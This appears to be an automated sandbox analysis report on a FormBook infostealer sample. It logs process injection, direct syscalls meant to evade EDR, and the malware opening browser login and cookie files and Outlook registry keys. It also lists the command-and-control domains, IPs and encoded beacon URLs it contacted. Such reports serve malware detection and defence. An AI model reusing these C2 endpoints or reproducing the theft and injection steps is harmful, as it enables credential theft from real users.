              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtAllocateVirtualMemory: Direct from: 0x77763C9CJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtClose: Direct from: 0x77762B6C
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtAllocateVirtualMemory: Direct from: 0x77762BECJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeMemory written: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeMemory written: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe base: 400000 value starts with: 4D5AJump to behavior
              Maps a DLL or memory area into another process
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeSection loaded: NULL target: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeSection loaded: NULL target: C:\Windows\SysWOW64\chkntfs.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Windows\SysWOW64\chkntfs.exeThread register set: target process: 8012Jump to behavior
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\chkntfs.exeThread APC queued: target process: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess created: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe "C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe"Jump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeProcess created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeProcess created: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe "C:\Users\user~1\AppData\Local\Temp\aj34fjqh.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess created: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe "C:\Users\user~1\AppData\Local\Temp\aj34fjqh.exe"Jump to behavior
              Source: xQUrWfQeELsQZII.exe, 0000000D.00000000.1357489799.0000000000CC0000.00000002.00000001.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 0000000D.00000002.3703470279.0000000000CC0000.00000002.00000001.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000000.1500766620.0000000001AB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: xQUrWfQeELsQZII.exe, 0000000D.00000000.1357489799.0000000000CC0000.00000002.00000001.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 0000000D.00000002.3703470279.0000000000CC0000.00000002.00000001.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000000.1500766620.0000000001AB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: xQUrWfQeELsQZII.exe, 0000000D.00000000.1357489799.0000000000CC0000.00000002.00000001.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 0000000D.00000002.3703470279.0000000000CC0000.00000002.00000001.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000000.1500766620.0000000001AB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
              Source: xQUrWfQeELsQZII.exe, 0000000D.00000000.1357489799.0000000000CC0000.00000002.00000001.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 0000000D.00000002.3703470279.0000000000CC0000.00000002.00000001.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000000.1500766620.0000000001AB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeQueries volume information: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeQueries volume information: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 25.2.aj34fjqh.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.8hd98EhtIFcYkb8.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.8hd98EhtIFcYkb8.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.aj34fjqh.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.1431852540.0000000001110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.3534960934.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.3530426239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3705299437.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.3708009401.0000000005850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3705534069.0000000004500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.1433410329.00000000020C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.3705085363.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\SysWOW64\chkntfs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

              Remote Access Functionality

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 25.2.aj34fjqh.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.8hd98EhtIFcYkb8.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.8hd98EhtIFcYkb8.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.aj34fjqh.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.1431852540.0000000001110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.3534960934.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.3530426239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3705299437.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.3708009401.0000000005850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3705534069.0000000004500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.1433410329.00000000020C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.3705085363.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
              DLL Side-Loading              		412
              Process Injection              		1
              Masquerading              		1
              OS Credential Dumping              		121
              Security Software Discovery              		Remote Services1
              Email Collection              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              Abuse Elevation Control Mechanism              		1
              Disable or Modify Tools              		LSASS Memory2
              Process Discovery              		Remote Desktop Protocol1
              Archive Collected Data              		13
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading              		41
              Virtualization/Sandbox Evasion              		Security Account Manager41
              Virtualization/Sandbox Evasion              		SMB/Windows Admin Shares1
              Data from Local System              		4
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture14
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets2
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Abuse Elevation Control Mechanism              		Cached Domain Credentials113
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
              Obfuscated Files or Information              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
              Software Packing              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Timestomp              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
              DLL Side-Loading              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1465534 Sample: 8hd98EhtIFcYkb8.exe Startdate: 01/07/2024 Architecture: WINDOWS Score: 100 42 www.tufftiff.xyz 2->42 44 www.xn--gotopia-bya.com 2->44 46 16 other IPs or domains 2->46 58 Snort IDS alert for network traffic 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 Antivirus detection for URL or domain 2->62 66 8 other signatures 2->66 11 8hd98EhtIFcYkb8.exe 3 2->11         started        signatures3 64 Performs DNS queries to domains with low reputation 42->64 process4 file5 40 C:\Users\user\...\8hd98EhtIFcYkb8.exe.log, ASCII 11->40 dropped 82 Injects a PE file into a foreign processes 11->82 15 8hd98EhtIFcYkb8.exe 11->15         started        signatures6 process7 signatures8 84 Maps a DLL or memory area into another process 15->84 18 xQUrWfQeELsQZII.exe 15->18 injected process9 signatures10 56 Found direct / indirect Syscall (likely to bypass EDR) 18->56 21 chkntfs.exe 16 18->21         started        process11 dnsIp12 48 185.234.72.101, 64480, 80 COMBAHTONcombahtonGmbHDE United Kingdom 21->48 36 C:\Users\user\AppData\Local\...\aj34fjqh.exe, PE32 21->36 dropped 38 C:\Users\user\...uOdzX7Ehz6t1H3[1].exe, PE32 21->38 dropped 68 Tries to steal Mail credentials (via file / registry access) 21->68 70 Tries to harvest and steal browser information (history, passwords, etc) 21->70 72 Modifies the context of a thread in another process (thread injection) 21->72 74 3 other signatures 21->74 26 aj34fjqh.exe 3 21->26         started        29 xQUrWfQeELsQZII.exe 21->29 injected 32 firefox.exe 21->32         started        file13 signatures14 process15 dnsIp16 76 Machine Learning detection for dropped file 26->76 78 Injects a PE file into a foreign processes 26->78 34 aj34fjqh.exe 26->34         started        50 www.ridcoredry.live 91.195.240.123, 64489, 64490, 64491 SEDO-ASDE Germany 29->50 52 www.vivaepicmarbella.com 46.30.215.51, 64464, 64465, 64466 ONECOMDK Denmark 29->52 54 11 other IPs or domains 29->54 80 Found direct / indirect Syscall (likely to bypass EDR) 29->80 signatures17 process18

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              8hd98EhtIFcYkb8.exe29%ReversingLabsByteCode-MSIL.Trojan.XWorm
              8hd98EhtIFcYkb8.exe100%AviraHEUR/AGEN.1308761
              8hd98EhtIFcYkb8.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\EuOdzX7Ehz6t1H3[1].exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\aj34fjqh.exe100%Joe Sandbox ML

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
              https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
              https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
              http://www.foryourhealth19.com/ym7q/100%Avira URL Cloudmalware
              http://www.xn--gotopia-bya.com0%Avira URL Cloudsafe
              https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
              http://www.vivaepicmarbella.com/e5cg/?FTP84=+iRPR6b0cHsvtSIKktiBhFksQ3J0g8xQjEPnQEYx5YYVoEZd7QcDm2acLw7Tj1bPoKM8M2uZ1cEL1EuWaogQQhFlafU2EKFDhhDWP+Lh20TqHHOR+DrFC95KlJHLt9tMC+FdDZkSCqct&Lb=GFtlIrHx8T500%Avira URL Cloudsafe
              http://www.tufftiff.xyz/vwgn/?FTP84=5ueMAWSl8HCdHaQ4ISZ1AQXhc5gyPvE6M+De+X7bZoAB9UCIok5O2fARcoTif8zUuE/VgVKiECkkSJ85U3W5QFFnp/YrlC4tzeltTmpoeWoUEn2HXZmMuQrIM+LIMwiHVH8SJcx756eW&Lb=GFtlIrHx8T500%Avira URL Cloudsafe
              https://img.sedoparking.com/templates/bg/NameSiloLogo.png0%Avira URL Cloudsafe
              http://www.erhaltungsmassage.com/ky1l/?Lb=GFtlIrHx8T50&FTP84=rq50Wd1lMHFX8odFqcPFBXSYTeLeWZzOZdEKt1q2Ng0jiW/1UU7Cv6Tb1vTcZWKNTv6a7aX5qQrtM6kOVx9AgvgUe5/Bja5gpUFr8IDyktkkvNGNZ4xEuXwKitfXYUFnVmIVCEjvmGcp0%Avira URL Cloudsafe
              http://www.86wqi.cyou/80eg/0%Avira URL Cloudsafe
              http://lookstudiov.com/u4jq/?Lb=GFtlIrHx8T50&FTP84=CDJU9pFFzFP5Q0%Avira URL Cloudsafe
              http://www.lookstudiov.com/u4jq/0%Avira URL Cloudsafe
              http://www.vivaepicmarbella.com/e5cg/0%Avira URL Cloudsafe
              http://www.ridcoredry.live/blq3/?Lb=GFtlIrHx8T50&FTP84=/QAAm0GouadCsSjm0XCQ0NNd9BYFgPCeNdHOqYXBISGV1GFo4SB1zqqUvhYZ4jEo/5lijPf3qt+9x6u7W4DslmBYMZTBtvuPQphb+44RgWDcLgkceETeTezSGqdjX9slNk8GIp6396hv100%Avira URL Cloudphishing
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
              https://www.namesilo.com/domain/search-domains?query=ridcoredry.live0%Avira URL Cloudsafe
              http://www.tufftiff.xyz/vwgn/0%Avira URL Cloudsafe
              http://www.foryourhealth19.com/ym7q/?Lb=GFtlIrHx8T50&FTP84=UxZF11kgGMhVJ3h1mYaBYZj5xwuySTV9/R2JXFp47AYwysMhWE1l+EvBnUyCPTtksKPA2Ite2ltCL7XTNGD56H2fTiCax6/BQq0vjYK7AyFfq6kTJWJKbnRCSHQhd4Mpl36RQO9kaMTf100%Avira URL Cloudmalware
              http://www.ridcoredry.live/blq3/100%Avira URL Cloudphishing
              http://www.cvt-auto.ru/1cpo/?FTP84=XWpmZSZkQQ3crjSg4jO9FnvqfvQgDjUUlmKrUzlk+2X+Pq/xYmmvIQcMng+aGKp/N3zIo6PNXS6jtUQwBpM9XRiN/OVETSVEN1Q9JXY1u8NKleTflw9Of0xlNOdKZA91JkeaJQbbmRkx&Lb=GFtlIrHx8T500%Avira URL Cloudsafe
              https://www.namesilo.com0%Avira URL Cloudsafe
              http://www.botokkkd4.top/i6sl/?Lb=GFtlIrHx8T50&FTP84=qssHGV29j0ZCAjpN6QtzDw+gnCiynPmFES/c0m6mTWJ8eKXYeJPjMTEVk7GvbqhDwPeBMRZatQ3ofr/5XjUfaZC8rCPfXyoknOgmUV1BLU/3HLT18Q+LgoHdoh8bcR/ofs2EqraVghMO0%Avira URL Cloudsafe
              http://www.botokkkd4.top/i6sl/0%Avira URL Cloudsafe
              http://www.filmbrute.com/vgf2/0%Avira URL Cloudsafe
              http://www.86wqi.cyou/80eg/?Lb=GFtlIrHx8T50&FTP84=/gUd74TM946IZLQfFCjFFoMEh/bZ058Y5fxYbd7lsAuEu+8WJ/21FtYOGJlKUg3YeQ1lkwlhlDEwsFjwCVkjP3HgvWH+eFvT+Cr55kx1O3kSIIeygKzK78qTqiVgNqoEH3t5dFc0+pi40%Avira URL Cloudsafe
              https://www.sedo.com/services/parking.php30%Avira URL Cloudsafe
              http://www.cr-pos.com/b9jt/0%Avira URL Cloudsafe
              http://www.cvt-auto.ru/1cpo/0%Avira URL Cloudsafe
              http://www.cr-pos.com/b9jt/?FTP84=I6wqk3vZ0MIwducyeDc5a1RUJrCEqnXhmjD4iKeo+QzF3CVziIh9NSuBhJSHyIOtb6QEc0JQU3wLuke4KM9e0eKAxB2ADTUoySVeubTpqpeKSrgjLWx1k8qzQ8FFILh8qZ99MFd/cRWi&Lb=GFtlIrHx8T500%Avira URL Cloudsafe
              http://www.xn--gotopia-bya.com/ynea/0%Avira URL Cloudsafe
